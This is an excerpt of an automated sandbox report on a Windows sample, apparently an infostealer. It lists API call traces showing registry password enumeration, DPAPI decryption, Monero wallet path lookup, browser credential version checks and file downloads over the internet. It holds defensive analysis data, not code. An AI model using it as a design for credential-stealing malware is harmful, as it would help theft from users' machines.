                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: bf43bbbb08d4d1949c93ac61ab4844275c2d7a428ac7bd678f2999b10c60c2c2
                                  • Instruction ID: 831a1f4a07f1d6522b72b7a0e9c12577ac808ff0edbba2508f4af4fe1b9ceef0
                                  • Opcode Fuzzy Hash: bf43bbbb08d4d1949c93ac61ab4844275c2d7a428ac7bd678f2999b10c60c2c2
                                  • Instruction Fuzzy Hash: DF514F75A10218AFDB10DFA4DC85AEE77B9EF48301F14912AF905E7290DB74AD01CBA1
                                  APIs
                                  • lstrcat.KERNEL32(?,011B04A8), ref: 003FE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE07D
                                  • lstrcat.KERNEL32(?,?), ref: 003FE098
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0AC
                                  • lstrcat.KERNEL32(?,0119A6E8), ref: 003FE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0D4
                                  • lstrcat.KERNEL32(?,011AF238), ref: 003FE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: e0b8df745acab5899ec1379d0a7a6af04e48aef6e2e6be537388b1f5a34b7927
                                  • Instruction ID: 3fbffb8fe97f9e84ebada72c4952c1049f9f5e9505d76146fb2fa1bafc5770c2
                                  • Opcode Fuzzy Hash: e0b8df745acab5899ec1379d0a7a6af04e48aef6e2e6be537388b1f5a34b7927
                                  • Instruction Fuzzy Hash: 76618F71D1012CABCB56DB64CC54AEE77B9BF48301F1489A9B609A7290DF70AF858F90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6AFF
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E6B2C
                                  • StrCmpCA.SHLWAPI(?,011B0C60), ref: 003E6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 003E6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003E6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003E6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003E6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003E6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 003E6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6C17
                                  • InternetCloseHandle.WININET(?), ref: 003E6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 4528755e4918eb4624c890fa50a18e6c5f674e510a9fe79397d01370f27f0a1d
                                  • Instruction ID: 9533a2d5b92ed7a69fc12855c00415e6441a4fad8b513bc0fac99beebace75b0
                                  • Opcode Fuzzy Hash: 4528755e4918eb4624c890fa50a18e6c5f674e510a9fe79397d01370f27f0a1d
                                  • Instruction Fuzzy Hash: DD41CF71A00216AFDB20DF65DC86FEE77B9AB18740F048569FA05E71C0DF70AE018BA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EBC1F
                                  • lstrlen.KERNEL32(00000000), ref: 003EBC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EBC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EBC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EBCAC
                                  • lstrlen.KERNEL32(00414AD4), ref: 003EBD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 0e13fda75f242e1f7fdea9ec6f8f58b6677471738bc2ea91ed017029cf2f0241
                                  • Instruction ID: a40b81be06f375885920b49b5b21947783aa1234893253a39c42f0738de7c3af
                                  • Opcode Fuzzy Hash: 0e13fda75f242e1f7fdea9ec6f8f58b6677471738bc2ea91ed017029cf2f0241
                                  • Instruction Fuzzy Hash: 0CA18E31A002558FCB23DF2ADD49AAFB7B9AF44304F19927AE406DB2A1DB71DC41CB50
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00406014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0040609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 004060D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: b8a30549f7125f82ebddf3065f88b6765cc95b39bd6da9cf70cb5744285cce82
                                  • Instruction ID: 065cd36bab2d2b2608d7cf0192d58eda41cb0f643a02fa6dffffabe9bd4bc597
                                  • Opcode Fuzzy Hash: b8a30549f7125f82ebddf3065f88b6765cc95b39bd6da9cf70cb5744285cce82
                                  • Instruction Fuzzy Hash: AA619070700604DBDB18CF5CC991A6EB3B6EF85304B24492AE592AB3C1D739ED918B9D
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE07D
                                  • lstrcat.KERNEL32(?,?), ref: 003FE098
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0AC
                                  • lstrcat.KERNEL32(?,0119A6E8), ref: 003FE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0D4
                                  • lstrcat.KERNEL32(?,011AF238), ref: 003FE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: cf8a405a4a12b7032187a9f4d96dcfe09ec997fede6697b434368d5cd94d6645
                                  • Instruction ID: 7e48212e5bb13925a40336c11e76da5560e9656d24a6002681ac78740e824b75
                                  • Opcode Fuzzy Hash: cf8a405a4a12b7032187a9f4d96dcfe09ec997fede6697b434368d5cd94d6645
                                  • Instruction Fuzzy Hash: E2419572D1016C9BCB26DB64DC45AEE73B9BF48300F044AA5F60997251DF709F858F90
                                  APIs
                                    • Part of subcall function 003E77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003E7805
                                    • Part of subcall function 003E77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003E784A
                                    • Part of subcall function 003E77D0: StrStrA.SHLWAPI(?,Password), ref: 003E78B8
                                    • Part of subcall function 003E77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E78EC
                                    • Part of subcall function 003E77D0: HeapFree.KERNEL32(00000000), ref: 003E78F3
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003E7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 003E7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E7AF0
                                  • wsprintfA.USER32 ref: 003E7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E7B47
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003E7B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: c347c0e7f3e52b87296f9409cdbc561a2e2363657d042b4a1e0249f73f6ec5d3
                                  • Instruction ID: 1e4b1a35ef63c2acde5cc4b0fa967563955cb5a8625b9a44d81d9b339d7b1190
                                  • Opcode Fuzzy Hash: c347c0e7f3e52b87296f9409cdbc561a2e2363657d042b4a1e0249f73f6ec5d3
                                  • Instruction Fuzzy Hash: 8931D872E142A4EFCB11DBA5DC449EFB77AEF88701F29961AE50993340DB70E941C7A0
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8243
                                  • lstrlen.KERNEL32(00000000), ref: 003F8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8297
                                  • lstrlen.KERNEL32(00000000), ref: 003F82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F82EB
                                  • lstrlen.KERNEL32(00000000), ref: 003F8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8337
                                  • lstrlen.KERNEL32(00000000), ref: 003F8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: bb5448a5a0bf5f5458866095e1e5cdcf8b3844819a6ab35d0f75b2527eec12ec
                                  • Instruction ID: 216ce059a1e694c9b067c9949bc9e26ea074e43b06a58694501b2c1bc4f2da5e
                                  • Opcode Fuzzy Hash: bb5448a5a0bf5f5458866095e1e5cdcf8b3844819a6ab35d0f75b2527eec12ec
                                  • Instruction Fuzzy Hash: 3B51CE799002169FDB1ADF39D858ABBB7A9EF00700F054625AE06DB254DF30ED61CBE0
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003E7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003E784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003E78B8
                                    • Part of subcall function 003E7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 003E775E
                                    • Part of subcall function 003E7750: RtlAllocateHeap.NTDLL(00000000), ref: 003E7765
                                    • Part of subcall function 003E7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003E778D
                                    • Part of subcall function 003E7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003E77AD
                                    • Part of subcall function 003E7750: LocalFree.KERNEL32(?), ref: 003E77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E78EC
                                  • HeapFree.KERNEL32(00000000), ref: 003E78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 003E7A35
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: bc89e0e34c7214a507b0f9a0f2da342f7dc1547f2814eae6ce65ecdcc8741c26
                                  • Instruction ID: 91568060361fe5dc9c0f5ce0155b95f80ba957aa9df792c95f753aedadfdfaff
                                  • Opcode Fuzzy Hash: bc89e0e34c7214a507b0f9a0f2da342f7dc1547f2814eae6ce65ecdcc8741c26
                                  • Instruction Fuzzy Hash: C97152B1D0025DAFDB10DF95DC81ADEBBB9FF45300F14866AE509A7240EB315A85CBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003E1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003E1173
                                  • RegCloseKey.ADVAPI32(?), ref: 003E117D
                                  Strings
                                  • wallet_path, xrefs: 003E116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 003E114F
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 1f485c2566f246948fa1f2291c8e8bcc6410eab08cad29af3f0e2d8af0b64f70
                                  • Instruction ID: c4fae558bcf6e1723a03f28ed5895d6a60c0b39040b4700651a8624ef0fcd1d2
                                  • Opcode Fuzzy Hash: 1f485c2566f246948fa1f2291c8e8bcc6410eab08cad29af3f0e2d8af0b64f70
                                  • Instruction Fuzzy Hash: A2F09075A40308BFE7009BE0AC4DFEA7B7DEB04756F104156FF05E2290E6B05A4487A0
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 003E9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 003E9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 003E9EA7
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • lstrcpy.KERNEL32(00000000,00414C48), ref: 003E9FB2
                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: f74fc6a6846db552b30b241aa14e14098265674427198fe6de7edb47bbfc2d00
                                  • Instruction ID: 8d9dde2cab3a76811459da86a8a29b2ffba0b8a35c741af93d11a4316eec1b19
                                  • Opcode Fuzzy Hash: f74fc6a6846db552b30b241aa14e14098265674427198fe6de7edb47bbfc2d00
                                  • Instruction Fuzzy Hash: E151C132A102699BCB12EF66DC41BDE77A8AF44315F154236F909EB281DBB0ED518BD0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003E565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E5661
                                  • InternetOpenA.WININET(0040CFEC,00000000,00000000,00000000,00000000), ref: 003E5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 003E5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003E56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003E56E1
                                  • InternetCloseHandle.WININET(?), ref: 003E56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 003E5701
Memory Dump Source
• Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: same associated dump regions as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 5f72df4e5335ef41dac79fcf5fa96272ef23702d70ca140699ec3ab7b1d00a8d
